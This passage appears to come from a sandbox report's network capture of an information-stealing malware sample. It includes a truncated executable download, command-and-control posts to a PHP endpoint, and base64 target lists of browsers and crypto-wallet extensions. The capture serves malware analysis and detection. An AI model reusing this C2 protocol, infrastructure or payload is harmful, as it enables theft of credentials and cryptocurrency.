                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893161058 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:59 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 391072
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfcc9-5f7a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>z*bS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!*q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893174887 CEST1236INData Raw: 16 63 32 13 dd d1 52 94 12 5d 30 6f 8c 66 c8 d4 eb ac d4 3c d5 39 1e 15 5e 6e 5c fb d2 d4 be ba 0a 5c d0 e3 32 ad 1a 0e 06 3d 1b 6e 6b ee d8 37 20 e6 2c 6f 92 38 ca ac 23 e8 62 f1 06 bc 2a 9e 54 a5 88 67 7d 71 42 b8 5b 00 ee 92 f0 da d3 1d de 7a
                                                                                                                                                                                                                                          Data Ascii: c2R]0of<9^n\\2=nk7 ,o8#b*Tg}qB[zl_63Bu!g<NS_V?i^</*V-vG/=OtQpV_,&H"fQ~+pS0Pzm(=/}T$]L7(I"T%{
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893179893 CEST1236INData Raw: 51 79 83 92 4f a5 86 9d 0e 9d 8c 6c 26 59 fc 7c 7e 06 9f 9d c9 72 03 ab 71 a8 79 50 30 0e 12 83 b4 bd 2b d4 f0 e5 6a bc 67 66 b5 d8 bb 03 76 3d 8e 28 a4 1c 69 f5 3e c9 3f db 95 c8 2b e0 d7 5d 47 57 f3 d6 ae e9 77 14 4b 7f 7b c1 a2 f3 b2 e1 a0 db
                                                                                                                                                                                                                                          Data Ascii: QyOl&Y|~rqyP0+jgfv=(i>?+]GWwK{ZdS8Co(QXv#cI8?lfbq&=tL<r=VvX7"WS_0TC#s0f0{S\tly(x=8[r0
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893186092 CEST1236INData Raw: 54 c0 a7 c5 b4 cf 54 a6 0f da 5a 80 92 0b 34 8f 52 a1 9a fb 79 0a bf 77 e5 c0 96 a1 1d 9d 4c 60 f1 2c 1a 5d fb 2f a8 af d8 f6 04 5b a7 30 9e cd d1 d7 aa 06 38 88 4d 9d 4f 1a 48 ee 99 18 98 f8 28 6f 94 74 7a 07 b7 40 53 52 42 31 59 d9 fb 81 0a 82
                                                                                                                                                                                                                                          Data Ascii: TTZ4RywL`,]/[08MOH(otz@SRB1YDisi\&*N_+kW=Xg}Rk]Rw%y:F{'Gk:Q#1$RY4[(f2:7T~}]q7xlWyy>/u,$vD9&}uG
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893196106 CEST1236INData Raw: d8 9b c1 e5 ca f7 9c bb b1 14 45 6e 8c f9 5f 32 83 7d 2f 55 7d 6b d9 63 fd 22 aa 01 33 60 a0 0b a9 d6 be 74 ec 70 d5 a0 ba 55 f7 41 69 2f 7a c2 da a2 51 1c fb 9d e3 d2 2b 50 20 84 7b 47 ce 23 ee c5 b2 af dd f6 f5 41 89 ef ff ed 28 5f 51 1f c1 42
                                                                                                                                                                                                                                          Data Ascii: En_2}/U}kc"3`tpUAi/zQ+P {G#A(_QBY)~#y]jdzR39lkyT%lrhVOMDo|fc9phSHWI^`3%%k,%^klv<=@d5*]>gz<0
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893201113 CEST1120INData Raw: cd d8 e0 03 eb 36 4a f9 ff 1f 71 90 ef 05 ea 41 61 0f c2 fe db c1 45 73 ea b9 e5 70 8f 35 26 8d 56 21 f0 76 86 e0 fe 62 ca 2e a3 0e 63 1b ab 09 8b 15 73 5b b8 a3 78 b1 36 bc 2d af e7 ec d7 b6 01 47 63 5e 59 c2 0a 88 74 f2 04 1e 5b 14 31 ec ed b3
                                                                                                                                                                                                                                          Data Ascii: 6JqAaEsp5&V!vb.cs[x6-Gc^Yt[1Y?fIXf0Y/~n-Lf3A3k?<0nxkS_|JxLu+V%RnrP+Dc-gp6\q<9L9[X<d8xCq
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893212080 CEST1236INData Raw: be 99 be e1 c6 40 eb 45 36 d9 b4 c8 59 fc f6 af af 4d 65 53 11 dd ef 18 cf 7c eb b5 5a 0a b4 c4 73 b6 39 c4 42 20 85 04 94 16 f1 b7 5b 89 f7 94 23 70 66 1b fb a2 07 47 9f 80 36 a7 b1 74 9a 90 e9 31 e9 c6 53 19 44 a2 b4 e3 3c d9 af cd 68 9f 1e 9e
                                                                                                                                                                                                                                          Data Ascii: @E6YMeS|Zs9B [#pfG6t1SD<h|vS|x<BnP-{!TPVT&)s)<|}j z1L:*jxxWw,$u+#UN3h3i tv56'KkEW_}Zy+:U
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893224001 CEST1236INData Raw: eb 4a e4 f3 74 38 8a cb 38 97 42 88 d7 e4 56 49 21 78 54 6c 0b c8 28 da 93 de ef 63 69 f0 11 d0 4d a0 5f 69 2f 39 20 37 a2 a8 ca f2 d1 3b bd ee 5f 02 66 d4 15 4b 5e 87 4e a7 f8 d2 bf 0b 6a 7a f7 10 7c 51 dc e1 2c d3 ff 40 77 b2 ee 14 38 77 2c e6
                                                                                                                                                                                                                                          Data Ascii: Jt88BVI!xTl(ciM_i/9 7;_fK^Njz|Q,@w8w,;b2Z(E|B`6#{Sk6 />84/^bv8ne2z0d|3jSTbC.5w||l`Iukon58!qW!JrGH;D
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893239975 CEST1236INData Raw: c0 06 54 78 7f 9b e9 d6 7f 35 f7 68 36 da b8 8f 0a 1f 54 30 44 45 eb 37 10 bd b5 1b 31 e0 40 ca 53 a9 ee 16 35 cf 40 a4 b8 b1 3c 5f 84 6a f7 43 a4 ff 75 6b dc 72 eb 10 d4 0d 00 61 9e 07 30 21 db 35 58 2d 4b 3a 32 e1 b4 c2 51 00 5f ae a5 fe 96 b8
                                                                                                                                                                                                                                          Data Ascii: Tx5h6T0DE71@S5@<_jCukra0!5X-K:2Q_?|xdcX/-0{S8tb{ R w]}$1>0>VDP:kXU@'cmdIdKh-^`2-OOcjHkpckQh<
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893251896 CEST1236INData Raw: 5d 95 78 6a a3 d1 34 92 ba 08 73 ce 55 fe 18 18 72 84 94 c5 73 0a 9c 35 fb dd 91 ab 39 be ec 2a 8f 86 b0 b9 c1 11 69 b2 93 92 61 35 fc 6e 6f 2e fb c1 b7 eb 08 8c 60 f0 45 0c 57 83 ab 4f 11 72 45 98 80 5f 6e a8 d6 b8 fe 30 bf d2 95 ca 76 28 dd 0d
                                                                                                                                                                                                                                          Data Ascii: ]xj4sUrs59*ia5no.`EWOrE_n0v(`u8e8iz&OHFGGvFhs[V>\[EDS7kZyC`Vx$kCps]$LSw?O6ET.k%D)-
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.893261909 CEST1236INData Raw: 61 ee 8f fe f1 f4 df a8 1b 24 e3 89 98 89 f4 22 0a 06 24 d0 d0 19 f3 a9 17 67 dd 67 85 69 c8 01 80 3d ab 4f 47 ad a0 37 de 37 cd 68 64 65 11 0f ed 72 e8 5c 74 d1 13 39 29 ee 5a 56 ff d3 b9 6d 8e cf 61 94 f2 cd 9d 3c 59 b8 19 32 c2 11 5b d2 6e aa
                                                                                                                                                                                                                                          Data Ascii: a$"$ggi=OG77hder\t9)ZVma<Y2[n1vHC(ZYcA1GOP-Dk |Hh<s<GVnc4tU|jg5k<),^e,J9H%)FOK`s


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          11192.168.2.65858046.8.231.10980
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:08.112857103 CEST87OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:08.710441113 CEST203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:08 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:08.776360989 CEST413OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 214
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="hwid"7C08C93C64433430373531------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="build"default------JDHIEBFHCAKEHIDGHCBA--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.082495928 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:08 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 180
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 5a 6a 67 30 4d 7a 63 34 4e 6a 56 6c 5a 6a 45 35 4e 6a 6c 68 4f 47 59 35 4f 54 42 6b 4d 32 45 78 4d 44 6c 68 4f 54 46 6d 4d 54 51 33 5a 6d 46 6b 4d 44 55 79 4f 57 49 79 4d 54 56 6b 4f 44 41 78 59 54 6c 6d 4d 32 4d 7a 4f 54 64 68 4d 7a 52 68 4d 44 64 6d 5a 57 4e 68 4d 32 55 30 4e 7a 45 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                          Data Ascii: Zjg0Mzc4NjVlZjE5NjlhOGY5OTBkM2ExMDlhOTFmMTQ3ZmFkMDUyOWIyMTVkODAxYTlmM2MzOTdhMzRhMDdmZWNhM2U0NzE1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.102179050 CEST467OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 268
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"browsers------CGHCGIIDGDAKFIEBKFCF--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.279361010 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:09 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 1520
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.279397011 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                                                                                                          Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.325684071 CEST466OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 267
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"plugins------AKKECAFBFHJDGDHIEHJD--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.503962040 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:09 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 7116
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.503979921 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                          Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.503989935 CEST448INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                          Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
